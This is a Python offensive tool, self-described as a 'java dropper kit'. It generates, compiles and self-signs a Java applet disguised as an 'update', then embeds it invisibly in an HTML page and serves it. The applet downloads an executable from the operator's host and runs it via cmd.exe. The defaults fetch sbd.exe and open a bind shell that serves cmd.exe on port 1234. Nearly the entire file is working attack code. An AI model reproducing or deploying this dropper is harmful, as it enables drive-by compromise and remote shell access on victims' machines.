#!/usr/bin/python

"""
this is based on val smith pre-metaphish stuff. And of course python roughly corrisponds to the Aitel book of style
"""

import os,socket

class jvd ():

def __init__(self):
self.localurl =" "
self.iName = " "
self.certName = " "
self.command = " "
self.command_args = " "
self.base_name = "update" # base java file name
self.java_name = self.base_name + ".java"
self.class_name = self.base_name + ".class" #class extension
self.unsigned_jarname = self.base_name + "_unsigned_.jar" #jar extenstion
self.signed_jarname = self.base_name + ".jar"

def write_file(self,name, data):
fh = open(name, 'w')
fh.write(data)
fh.close
print "[*] wrote to " + name

def jcode(self,command,command_args,filename):
javacode = \
'import java.applet.Applet;' +"\n" \
'import java.io.*;' + "\n"\
'import java.net.*;'+"\n" \
'import java.io.IOException;'+"\n" \
'public class update extends Applet {' + "\n"\
'public update() { }' +"\n" \
'public void init() { downloadURL(); cmd();'+"\n" \
'} /* end public void init */'+"\n" \
'public void downloadURL() {'+"\n" \
'OutputStream out = null;'+"\n" \
'URLConnection conn = null;'+"\n" \
'InputStream in = null;'+"\n" \
'try {'+"\n" \
'String geturi = getParameter("URI");'+"\n" \
'URL url = new URL(geturi);'+"\n" \
'String localfile = getParameter("LOCALFILE");'+"\n" \
'if (localfile == null) { localfile = "'+ command + '";}' "\n" \
'out = new BufferedOutputStream('+"\n" \
'new FileOutputStream(localfile));'+"\n" \
'conn = url.openConnection();'+"\n" \
'in = conn.getInputStream();'+"\n" \
'byte[] buffer = new byte[1024];'+"\n" \
'int numRead;'+"\n" \
'long numWritten = 0;'+"\n" \
'while ((numRead = in.read(buffer)) != -1) {'+"\n" \
'out.write(buffer, 0, numRead);'+"\n" \
'numWritten += numRead;'+"\n" \
'} /* end while */'+"\n" \
'} /* end try */'+"\n" \
'catch (Exception exception) {'+"\n" \
'exception.printStackTrace();'+"\n" \
'} /* end catch */'+"\n" \
'finally {'+"\n" \
'try {'+"\n" \
'if (in != null) {'+"\n" \
'in.close();'+"\n" \
'} /* end if */'+"\n" \
'if (out != null) {'+"\n" \
'out.close();'+"\n" \
'} /* end if */'+"\n" \
'} /* end try */'+"\n" \
'catch (IOException ioe) { }'+"\n" \
'} /* end finally */'+"\n" \
'} /* end public void downloadURL */'+"\n" \
'public void cmd() {'+"\n" \
'Process process;'+"\n" \
'try {'+"\n" \
'process = Runtime.getRuntime().exec("cmd.exe /c ' + command + ' ' + command_args + '");'+"\n" \
'} /* end try */'+"\n" \
'catch(IOException ioexception) { }'+"\n" \
'} /* end public void cmd */'+"\n" \
'} /* end public class */' +"\n"
self.write_file(filename,javacode)



def sign(self,signed_jar,unsigned_jar,cert):
signer = "cn=" + cert
cmd0 = "keytool -genkey -alias signFiles " + \
"-keystore tkeystore -storepass tstorepass -dname "+ signer + " -keypass tkeypass"

cmd1 = "jarsigner -keystore tkeystore " + \
"-storepass tstorepass -keypass tkeypass -signedjar " + signed_jar + " " + unsigned_jar +" signFiles"


print "[*] executing " + cmd0
os.system(cmd0)
print "[*] executing " + cmd1
os.system(cmd1)


def servit(self):
import SimpleHTTPServer
# = 8888
SimpleHTTPServer.test()

def javac(self,java_name,class_name):
javac_cmd = "javac "+ java_name
os.system(javac_cmd)
print "[*] compiled " + java_name + " to classfile " + class_name


def jarit(self,jarfile,classfile):
jar_cmd = "jar -cvf "+ jarfile + " " + classfile
print "[*] compressing " + jarfile
os.system(jar_cmd)

def icode(self,filename,localurl):
iframecode = \
'<html>' \
'<body>' \
'<APPLET code="update.class" ' + \
'archive="'+ "update.jar" + '" width="1" height="1">' \
'<PARAM NAME="URI" VALUE="'+localurl +' ">' \
'</APPLET>' \
'</body>' \
'</html>'
self.write_file(filename,iframecode)





def run(self):

self.icode(self.iName,self.localurl)
self.jcode(self.command,self.command_args,self.java_name)
self.javac(self.java_name, self.class_name)
self.jarit(self.unsigned_jarname,self.class_name)
self.sign(self.signed_jarname,self.unsigned_jarname,self.certName)
self.servit()




if __name__ == '__main__':

print "[*] inititiating java dropper kit"
local_ip_address = socket.gethostbyname(socket.gethostname())
app = jvd()
app.base_name = "update"
app.localurl = "http://"+ local_ip_address +":8000/sbd.exe"
app.certName = "\"cert\""
app.command = "c:\\\d.exe"
app.command_args = " -lp 1234 -e cmd.exe"
app.iName = "index.html"
app.run()